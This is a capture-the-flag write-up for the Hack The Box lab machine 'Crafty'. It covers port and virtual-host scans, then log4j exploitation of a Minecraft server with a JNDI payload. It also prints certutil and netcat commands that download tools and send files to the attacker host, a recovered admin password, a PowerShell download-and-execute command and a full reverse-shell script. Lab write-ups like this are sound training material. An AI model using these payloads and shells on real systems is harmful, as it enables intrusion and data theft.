Crafty
-
4 mins read
author: sysevil
OS: Windows Difficult: Easy ip: 10.10.11.249
Port Scan
nmap -p- -T4 --min-rate=10000 10.10.11.249 -oG open_ports_full
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 13:34 -03
Nmap scan report for 10.10.11.249 (10.10.11.249)
Host is up (0.13s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
25565/tcp open minecraft
Nmap done: 1 IP address (1 host up) scanned in 13.58 seconds
nmap -sV -sC -A -p 80,25565 -T4 --min-rate=1000 10.10.11.249 -oG open_ports_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 13:36 -03
Nmap scan report for 10.10.11.249 (10.10.11.249)
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://crafty.htb
25565/tcp open minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 136.51 ms 10.10.14.1 (10.10.14.1)
2 136.54 ms 10.10.11.249 (10.10.11.249)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.48 seconds
Add the crafty.htb to /etc/hosts -
echo "10.10.11.249 crafty.htb" | sudo tee -a /etc/hosts
Dir Scan
dirsearch -u http://crafty.htb -e jsp,php,asp,aspx,md,yaml,ini,txt,yml,zip,tgz,gz,toml -x 404,500,403
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: jsp, php, asp, aspx, md, yaml, ini, txt, yml, zip, tgz, gz, toml | HTTP method: GET | Threads: 25
Wordlist size: 15708
Output File: /home/parallels/Documents/htb/machines/crafty/reports/http_crafty.htb/_24-02-15_13-47-38.txt
Target: http://crafty.htb/
[13:47:38] Starting:
[13:48:22] 301 - 145B - /css -> http://crafty.htb/css/
[13:48:32] 301 - 145B - /img -> http://crafty.htb/img/
[13:48:32] 301 - 145B - /index.html -> http://crafty.htb/home
[13:48:34] 301 - 144B - /js -> http://crafty.htb/js/
Vhost Fuzz
ffuf -u http://crafty.htb -H "Host: FUZZ.crafty.htb" -w /usr/share/wordlists/amass/subdomains.lst -fw 9
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://crafty.htb
:: Wordlist : FUZZ: /usr/share/wordlists/amass/subdomains.lst
:: Header : Host: FUZZ.crafty.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 9
________________________________________________
:: Progress: [8215/8215] :: Job [1/1] :: 297 req/sec :: Duration: [0:00:27] :: Errors: 0 ::
Tech Stack
- minecraft Minecraft 1.16.5
- The only CVE that i found was https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35054 (( Ryotak ))
- I was looking for something related and found the video from John Hammond about log4j and minecraft https://www.youtube.com/watch?v=7qoPDq41xhQ
- Web app have a reference to another subdomain
play.crafty.htb
- Add this
subdomainto the/etc/hosts/file too. - Communicate with
minecraftclient with https://github.com/ammaraskar/pyCraft
Entry point log4j
- Running the tool from https://github.com/kozmer/log4j-shell-poc
python3 poc.py --userip 10.10.14.9 --webport 8000 --lport 9001
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up LDAP server
[+] Send me: ${jndi:ldap://10.10.14.9:1389/a}
[+] Starting Webserver on port 8000 http://0.0.0.0:8000
- Getting the shell
user.txt
root.txt
- first verify if the
certutil.exewas installed to retrieve and send files to the machine.
- With the windows bins from
kaliit’s easy to send a copy ofnc.exeto the machine
certutil.exe -urlcache -split -f http://10.10.14.9/nc.exe nc.exe nc.exe
- Retrieve the plugin
playercounter-1.0-SNAPSHOT.jar - Attacker machine:
nc -lp 9001 > playercounter-1.0-SNAPSHOT.jar - Victim machine:
C:\Users\svc_minecraft\Desktop\nc.exe 10.10.14.9 9004 < C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar
- Using jadx to get credentials - Jadx - https://github.com/skylot/jadx/releases
s67u84zKq8IXw
- Using the following
powershelltrick you can create a small reverse shell inpowershelland execute asadmin
$SecPass = ConvertTo-SecureString '<pass>' -AsPlainText -Force
$cred = New-Object System. Management.Automation.PSCredential('Administrator', $SecPass)
PS C:\Users\svc_minecraft\Desktop\> Start-Process -FilePath "powershell" -argumentlist "IEX(New-ObjectNet.WebClient).downloadString('http://10.10.14.9/shell.ps1')" -Credential $cred
- shell.ps1
$LHOST = "10.10.14.9"; $LPORT = 9001; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
- Run and get the
rootflag.
